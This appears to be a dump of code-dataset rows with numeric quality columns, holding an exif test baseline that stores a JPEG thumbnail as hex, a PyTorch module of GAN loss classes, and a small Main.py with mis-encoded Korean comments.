| 0.05
| 0.166667
| 24
| 1
| 24
| 24
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b2ff97f70a38d1cd0b901c0cb8a2752b65d4b084
| 9,628
|
py
|
Python
|
exif/tests/get_file_baselines/grand_canyon_thumbnail.py
|
chbndrhnns/exif
|
65aa2d8bcdecf79d34752390310222a9bd5d5bb3
|
[
"MIT"
] | null | null | null |
exif/tests/get_file_baselines/grand_canyon_thumbnail.py
|
chbndrhnns/exif
|
65aa2d8bcdecf79d34752390310222a9bd5d5bb3
|
[
"MIT"
] | null | null | null |
exif/tests/get_file_baselines/grand_canyon_thumbnail.py
|
chbndrhnns/exif
|
65aa2d8bcdecf79d34752390310222a9bd5d5bb3
|
[
"MIT"
] | null | null | null |
"""Grand canyon thumbnail."""
from baseline import Baseline
GRAND_CANYON_THUMBNAIL = Baseline("""
ffd8ffdb004300080606070605080707070909080a0c140d0c0b0b0c1912130f141d1a1f1e1d1a1c1c20242e27
20222c231c1c2837292c30313434341f27393d38323c2e333432ffdb0043010909090c0b0c180d0d1832211c21
323232323232323232323232323232323232323232323232323232323232323232323232323232323232323232
3232323232ffc0001108007800a003012100021101031101ffc4001f0000010501010101010100000000000000
000102030405060708090a0bffc400b5100002010303020403050504040000017d010203000411051221314106
13516107227114328191a1082342b1c11552d1f02433627282090a161718191a25262728292a3435363738393a
434445464748494a535455565758595a636465666768696a737475767778797a838485868788898a9293949596
9798999aa2a3a4a5a6a7a8a9aab2b3b4b5b6b7b8b9bac2c3c4c5c6c7c8c9cad2d3d4d5d6d7d8d9dae1e2e3e4e5
e6e7e8e9eaf1f2f3f4f5f6f7f8f9faffc4001f0100030101010101010101010000000000000102030405060708
090a0bffc400b51100020102040403040705040400010277000102031104052131061241510761711322328108
144291a1b1c109233352f0156272d10a162434e125f11718191a262728292a35363738393a434445464748494a
535455565758595a636465666768696a737475767778797a82838485868788898a92939495969798999aa2a3a4
a5a6a7a8a9aab2b3b4b5b6b7b8b9bac2c3c4c5c6c7c8c9cad2d3d4d5d6d7d8d9dae2e3e4e5e6e7e8e9eaf2f3f4
f5f6f7f8f9faffda000c03010002110311003f00f4d62477a61de7a0ae8218d60ddc530838aa44913a16a88c55
71131318e050013c55137265898f4352080d4b00f2ce7935221da793536289d5d48eb8a5debeb486481c74a717
a8655c89c82def49d2a1b28439a63391c534264a5778e952221db5420f2be6e94c922217814d3115da2623eb4d
fb3bf5ab892c6f90c7b5385b8ee1aaee40e5800ecd5208fd8d26343bca53d452fd9626ea48a9b8c78b24ec4d3b
ec8807534ae507938f5a694a963216041a371e959b45a61f31ed4c68dfd28481b27008e94e0e4569633b8f129a
78901a2c3e61c369f4a3621a109ea2f94b9e9479429dc431a21ea69be5aaf5dd54992c50a9d8b5218c7f78d031
4023f8a9c5914659c0fc690c69b88ffbd9a619a33d2972b0e6431896e805342cb9fe1a7ca2e60db2e7ef63e94c
6593bee34ec1726478ba17fcea4cc27f8e33f46acee55850887a11f9d2f9433c114d489b1208e9c10d1701c10d
2edf5a2e171a507a530c04f6fd6a9321879440ff00ebd06227daaee8571a62ff0068d34c01baff002a2e8433ec
abea7f2a5fb27a1a3990598f5b723de9e2203ad4b65a42796334bb7b62a6e5d8f244d77553a9476c3c43235adc
0262b82aa08e3a118c8e7835a316a9aaa3431c7ac4933b93bd4c4994c6383c75e6b85d668eb54917f52d6757d3
9616fb64325b95fde3181728d9e071ebfcea01aeeb8f710c467b7d9228652221d093fe142afa5c4e8d997175bd
6d3516b43736e51977472a460f1ea467a75a2d7c59a879b109ee2128f2795fbb84925b9e9ce29fd618bd81a49e
25ba17cb6bbedb79e798d81da4e01eb52dbf8b83ed12c7192c485d84f38ebc1ef550ae9bb326542cae5e5f1245
c661ebd39eb53aebf6e4730b8fd45746a63ecc0ebd687a21a85fc456e8706239aa4d8bd931ade24b70b91093ff
0002a8cf89a26cecb7c81c93bbff00ad436c152645ff00096c3ff3edff008fff00f5aa45f165901fbc8dd7e9ce
7e94aec7ecd8f3e28b151ba4495140cf2b8e3f3a587c61a2c92044171231eb84e052e6635043a2f1568b3cef0a
5c0deadb4a8e704f6ae0fe2778d26b28adf4fd2af961924cb4e50e1f6f619ed9acdcdd8ae43cf3518dadeed9ad
24061572d137b1e40ad8b2f105ec7712dec4e8b3c8a3721e5588efec6b99ae64742972b35a7d78dfd8fef2cf20
9dd2e1f001041e9e99ab31eb73cb730cd12f973041167a8dbdb8ac542c8d9d4beb60babcba8efe2be8932550c4
d1ae4719ebc56644d7d6d21281a5816e44f14722f1ce4e33e9d6aa29244c9dcd8b6bbb8bd0d7102ac130f9786c
8e3b1aa834f9a69a65777478bf784274e7924134a368bd4b6b996874367f6816abe74d1b303d739fccfad5e798
346010a7e95d91aae491cee0d311d9f202c642e3a9e6ab4914b260bb1db9ce0251ceca48688379524b052703e5
e685b43920e4fe147336559217c8c2e7b9e9d3a5412c113af405873d726ad4999bb1125b426456df83e841c8fe
958daf6a9a7e99fe8373e7a8963e5a25c601f7a5298ecad73cf6daeded2f566b63e6847fdd963b771e809a9b5a
96f754be50f06678e2c164f9b701d4e47519ae7bb7a11d0ebac9f4cd56c57cae1c21c24abb712fa74e47f8554d
5746b9b253aa5a244d68177108df3281c127d066b28cda9599d2e09c7991af6d0c72d85a6b30c8b1c736219222
996dc3f8b1ea6ba0b1d19277fb38b9b86500b26155471d07f9e82a252b0d42e3aee06d35de5f3e4ca105f73ff0
92037f33dea95c595b412a5b2249e5b42e325f20b0fba003d3bd4a95cae5b18fe15ba5bf54f3549f2e52b276c9
231f9735acf72f63716eb7002acdba3191d5c76cfae3f91ab92f7ac34d285c279ae07eeb7c7f20db855e4fa37f
2a75bcc194894fcc3a103231569d910b565fb6ba037797395cf0411c1ab8f768114c6c58f7f4ab8bd489221935
2755c32b951cd402fc5ccaa8aa4961dce2b548cdb15bfbc3208a63b795cb6066a9489b75239b5036d0b4e66262
8d7ee94cd79a789f567d6b545962440c80c4d923181df8ace654b44607971c633bdb79c93b791ed4eb69ded492
9330debb4fcbc91e99f4359dec423b1f0dc693d94f3c985581e3971fc472db4e3f0adbb8912cfc37aed94ecc66
60c62c8e3613ea3d339acea6b2b1d74f48dcc1f096b4f6712d84aebf677903166ff967c8c9fa62bd4a5bcb4648
e6b7ba08cac191860640ebd7daa3111d6e8ba0fddb32bebb7105e47912ee8be512ec6c839ffebd73d7578d1c80
4b1ef0bb4afcd91bb1cff5a8a6b41d49a4cc8b0d226d2a295d5fce17126e18e158765fad6bc0897d1bc5237cc3
0c03f546ff001f7ade4eeee611ec390cde58472b2152473c9c54683f7c4950aa3a11d6a2f735574ae5f8c2a32a
ee014f7c66ae1b64057136ec6785e7354a561b85c64caf131057e5ea33dc55228a7957daddb22b78c8e59ab318
1ae217c8f9c7a678cd594b92f0ee75f988c91e98aa62452ba8a1beb668e41ba2907201c1af38d674d9f4cba481
88647c94900e71fd2a66ae825b19f2245b300a927ae1b9350450e7f7afb5b03ee9e2b24f4219d678684cd74f11
df1c6d0346fdb3e9faff005ae927759b4eb8b6b80dbca18c9e00c63191ef4aa2f78ea84bdd3978bc2cf6efb88b
89616fee1c66b7edf74aa814fcb1fca09e481ef5537cc8c6375a1a31aca016038917046ec60fb53d563906dbad
c8e060638dfea6b2b9b72b68991a28added1f6b46aa1941e491fe7fa55298c50cb1ed90fcc081db03d0fe94ae6
8a368dd9792df7480acacc8e0303e9486d0c6c4e582b9e4f520d245cb5893c40aca10b86ec3e6e95acb6b25b60
b1407b1dbd6aae4ab966e1629adb331d8cbc8acac20fbc9f8d6907a18545ef0e06d723e66e9ce56a44f2e45215
39c7ad55d8972897964f17ef1d02ee51c0ed5e73e2db3b97759e36325b2ae18a72067bd3e6ba14d6871d1a797f
3a637fbf6a895a5123939c7f111d052b5d189e9335ac8ffbd8f70727bf5e2a24bc7926f2ee41126de3d08fa8a9
5a9a6c6fe9f786187ececd1b3924050df3271593796c2dae8dc412c8e31b8e3921bbfd41fd2b3bd9d8da307257
24b2d5adae60da0347708e5704d5f6b69aee131abaae40cee18e47bd4b5666f092686a5aef292bb6f70bb644e9
8c76c7a55a6b0475ddb5430fba7b8cf5a1b1c55d6a24402ca14c9f2a9e4633d6b41d15a168cc8e848edd4d260b
6b10a0de8227e594803d4d69c33452da491167fb4af004849a193768bbb19ad76cb01638ea3922b258a465d244
6dbd88eb5a45984f72033400e442e171eb9a789d3811af38efdaaeec956395f165fdf5b6a325d24a515edc4321
53ce3e9fe7a537c2d6ccf62911920963619c4873b41ea3d7142d10377651f1268da614315addd9c77c18858d1b
6afbe49ef5e76eb35b4ef0bb725b070723f3aa46535667ac5a6a304f691ed5c955db96393f9d0f344b2a2b58a9
427693ebf4ac9dd33a29f2bdca973aa47a46a51b95c59bc837e002573ebed56aca469d4ba3a00ac70430e454ca
375735a6d29588ae34c2f76f74872ce32c3be474c1ad6d3269248b0eff00be1c30239fad36ee8495a5a7516f25
166b2dca12d201b1940ceeef8e2af4047d8b2932371d76139cfa566f6358be856b9082691a791f682369276a8e
d8c0eb57ad583811c849623839e0d3e82d2e4af652372a8778e33ed56062c1c3120c9fc64741410d5e562f0967
10865f99ff008431e48f5ac6be96692e0bb28563c7b538efa18cc846e270b183ef56634f293e75dac4fe35a5c9
45492dad24984f2db6e2083b98640c5702de20483509ecf4ab74801999cb87e1b1d319e00ebc53429191a95c47
a94ef752da80f9c4ce0f04fb554d96fe53c6d1a14c6432f0463b668bd8876bdc726a52da31f2ddb07923ae6af4
3e20b95da73bd070bbce48ad65052d4a8cf958c935192ea17494ef571b5862b574bd46c2de2f2ae639106ddaac
8723f1153cb65629cd377359af2236cb7105c48501e71dbea29c352468f7c0ae1c756cf247707159246cdeba1b
51cc92db70ea02e19dbae011566c1e25db68adba36188994f51d7afa566ca4f528eb70b4d7b6c5cfee900e9c9e
3d6ac4c970df3da2962cc0f3d3f0aabe88977bb3a4d3af546f8a63cc4a158b71824567dda99e7768dff765cf23
b5677f7ac6b1568dc5d46eae74eb10d1c41ca0e99e40a8acf65fc02e60732ab7de42bca9ef5a2dae8e67bd87ac
652605d01ddf2938c63da9d75770da283b09c753e9f9d31232755d694e9773c88e10bb5801b99811e95e6f65a3
c124c8d34d8b69321e51ff002cc9008527a679a7160e3b047716f697725b5a4524b2676a9fbcb20ff77d7e954a
795dddd2487ca60dcaedda57d88aab194ac5b1e18be99433bc3181d72d923f2abb0f85191496bc8cb0e891a162
6b5f68914e04d2f868c16ed3b5d2a30c7ee9930cd9f4a7c3a6dbc11f9734a5ddbf8106063ea6a5cd0d40b42cec
a384c6b113dcee72067b71524052152a90aa8ebf7ea1bb9a2562d5abb6640d2431c6dd438e0e3e9579648b4f58
cc096f142b92a236270dd7bf6a9b0ef61f15dc7773aa4f3208f3b896fe1f502b7da6d3628112cee220ac32e03e
76ff008544ae8b8abbb98b25d4114f79f6bb978ccb2f41cfca30294f886cac900b48a4b84071ba43b4367d075a
396e8a94fa10def89a69a1d8218d93a3277fceaa41e22b9b65db1421727f8063354a36462f7b90db6bda879cf9
732ae7288c8495cfd2aba5c1bb925335ccc8f236e393800d532513a258a4322dcdf328c60007ef7e7d8d6496d2
e3b296d22491d5cfcc431009ec7de9265348c1d461164b09b676f3836448a307db9f51594d7134b334b2cacccf
f333b9c963deb45a9cf2763d154bee52db377fb200ad5b5413b9489897519e3bfe559e86e437ba6dd4f7aa1558
2a8ce6450d9fcff9d360d0e18a454b8762c464765fa669dd0ae25d695106020408abf78bc84835545b44cec5a4
45f719ebec2828ace2276e5f001c720922836c819774c42f7f93a0a004898046f318c6a3804ae770f5a8cc91e0
95c7f8fd69e8086acc4925893ec286951b6952430e99a5e4221f346fcef393c6693cd9438712b1c7bd30236bcb
8030934807a06aab25c4a1bef13cfe74c4466e0b100fe154e4bc9a366404ed1df1c504b653925775fbe724e7ad
40e4107232a7d29a3167a4b58deac3b8d94a8a3d45751a4409a6d8ec65cccdf34a476f6ac99d45b7be8b0498c9
c74c8eb59baa4f7135be523f2a31c92adf352123989a73c8c64679c9cd406e1c740bc0c62a8a18a776e053767f
0a4de563033f5e698884c819b6f5ef4aa081d57a6706810e0032676e1b1c73c9a6f9323b280986c725ce050030
584f904cb1853dcbe7f0e2adff006339507ed90eeecb834c4324d0e5c645cc7c9ec0d569b45911c0f30153c640
3c534c452b986dad0e24999b8cfc8bd6ab4df66b940209b6f192b21c66992d993c899810383f5a182aa13b8373
c76a7e4647ffd9
""")
| 89.148148
| 94
| 0.944121
| 112
| 9,628
| 81.142857
| 0.955357
| 0.002421
| 0.004401
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.64463
| 0.054217
| 9,628
| 107
| 95
| 89.981308
| 0.353393
| 0.002389
| 0
| 0
| 0
| 0
| 0.992187
| 0.937598
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.009615
| 0
| 0.009615
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
650f396249d2c5e6c28911d288e4bd87b9f79469
| 3,332
|
py
|
Python
|
nnutils/loss/gan.py
|
STomoya/animeface
|
37b3cd26097d7874559d4c152e41e5712b7a1a42
|
[
"MIT"
] | 61
|
2020-06-06T08:25:09.000Z
|
2022-03-28T13:30:10.000Z
|
nnutils/loss/gan.py
|
OrigamiXx/animeface
|
8724006df99ba7ef369e837d8294350ea733611b
|
[
"MIT"
] | 13
|
2020-07-02T02:41:14.000Z
|
2021-05-09T14:24:58.000Z
|
nnutils/loss/gan.py
|
OrigamiXx/animeface
|
8724006df99ba7ef369e837d8294350ea733611b
|
[
"MIT"
] | 8
|
2020-10-03T18:51:16.000Z
|
2022-02-05T18:18:01.000Z
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from nnutils.loss._base import Loss
class Adversarial(Loss):
def real_loss(self,
prob: torch.Tensor
) -> torch.Tensor:
raise NotImplementedError()
def fake_loss(self,
prob: torch.Tensor
) -> torch.Tensor:
raise NotImplementedError()
def d_loss(self,
real_prob: torch.Tensor,
fake_prob: torch.Tensor
) -> torch.Tensor:
rl = self.real_loss(real_prob)
fl = self.fake_loss(fake_prob)
loss = rl + fl
if self.return_all:
return loss, rl, fl
return loss
def g_loss(self,
fake_prob: torch.Tensor
) -> torch.Tensor:
return self.real_loss(fake_prob)
class GANLoss(Adversarial):
'''original GAN loss
Ld = E[log(D(x)) + log(1 - D(G(z)))]
Lg = E[log(1 - D(G(z)))]
'''
def __init__(self,
return_all: bool=False
) -> None:
super().__init__(return_all=return_all)
self.criterion = nn.BCEWithLogitsLoss()
def real_loss(self,
prob: torch.Tensor
) -> torch.Tensor:
valid = torch.ones(prob.size(), device=prob.device)
return self.criterion(prob, valid)
def fake_loss(self,
prob: torch.Tensor
) -> torch.Tensor:
fake = torch.zeros(prob.size(), device=prob.device)
return self.criterion(prob, fake)
class LSGANLoss(GANLoss):
'''least square GAN loss (a,b,c = 0,1,1)
Ld = 1/2*E[(D(x) - 1)^2] + 1/2*E[D(G(z))^2]
Lg = 1/2*E[(D(G(z)) - 1)^2]
'''
def __init__(self,
return_all: bool=False
) -> None:
super().__init__(return_all)
self.criterion = nn.MSELoss()
def d_loss(self,
real_prob: torch.Tensor,
fake_prob: torch.Tensor
) -> torch.Tensor:
rl = self.real_loss(real_prob) * 0.5
fl = self.fake_loss(fake_prob) * 0.5
loss = rl + fl
if self.return_all:
return loss, rl, fl
return loss
def g_loss(self,
fake_prob: torch.Tensor
) -> torch.Tensor:
return self.real_loss(fake_prob) * 0.5
class NonSaturatingLoss(Adversarial):
'''non-saturating GAN loss
Ld = E[log(D(x)) + log(1 - D(G(z)))]
Lg = E[log(D(G(z)))]
'''
def real_loss(self,
prob: torch.Tensor
) -> torch.Tensor:
return F.softplus(- prob).mean()
def fake_loss(self,
prob: torch.Tensor
) -> torch.Tensor:
return F.softplus( prob).mean()
class WGANLoss(Adversarial):
'''WGAN loss
Ld = E[D(G(z))] - E[D(x)]
Lg = -E[D(G(z))]
'''
def real_loss(self,
prob: torch.Tensor
) -> torch.Tensor:
return - prob.mean()
def fake_loss(self,
prob: torch.Tensor
) -> torch.Tensor:
return prob.mean()
class HingeLoss(Adversarial):
'''Hinge loss
Ld = - E[min(0, 1 + D(x))] - E[min(0, -1 - D(G(z)))]
Lg = - E[D(G(z))]
'''
def real_loss(self,
prob: torch.Tensor
) -> torch.Tensor:
return F.relu(1. - prob).mean()
def fake_loss(self,
prob: torch.Tensor
) -> torch.Tensor:
return F.relu(1. + prob).mean()
def g_loss(self,
fake_prob: torch.Tensor
) -> torch.Tensor:
return - fake_prob.mean()
| 21.22293
| 60
| 0.556122
| 459
| 3,332
| 3.908497
| 0.152505
| 0.19621
| 0.14214
| 0.167224
| 0.781494
| 0.748606
| 0.715162
| 0.715162
| 0.715162
| 0.610925
| 0
| 0.012409
| 0.298619
| 3,332
| 156
| 61
| 21.358974
| 0.755242
| 0.123349
| 0
| 0.670213
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.180851
| false
| 0
| 0.042553
| 0.095745
| 0.446809
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
33069d8a4b006d37e31b638f6b2abd71d413db8c
| 130
|
py
|
Python
|
Main.py
|
Young308/python_study
|
9c78874567ac913cfa5849faefed8b4a2ab41276
|
[
"MIT"
] | null | null | null |
Main.py
|
Young308/python_study
|
9c78874567ac913cfa5849faefed8b4a2ab41276
|
[
"MIT"
] | null | null | null |
Main.py
|
Young308/python_study
|
9c78874567ac913cfa5849faefed8b4a2ab41276
|
[
"MIT"
] | null | null | null |
# Hello.py๋ฅผ ๋ชจ๋๋ก ๊ฐ์ ธ์ด
import Hello
print('main.py__name__: ', __name__) # name ๋ณ์ ์ถ๋ ฅ
# __main__ ๊ฐ์ ํ์ฌ ์คํ๋๋ ํ์ผ์ ์ด๋ฆ (__name__)์ด๋ค
| 14.444444
| 50
| 0.7
| 22
| 130
| 3.409091
| 0.772727
| 0.213333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 130
| 8
| 51
| 16.25
| 0.721154
| 0.523077
| 0
| 0
| 0
| 0
| 0.293103
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 6
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.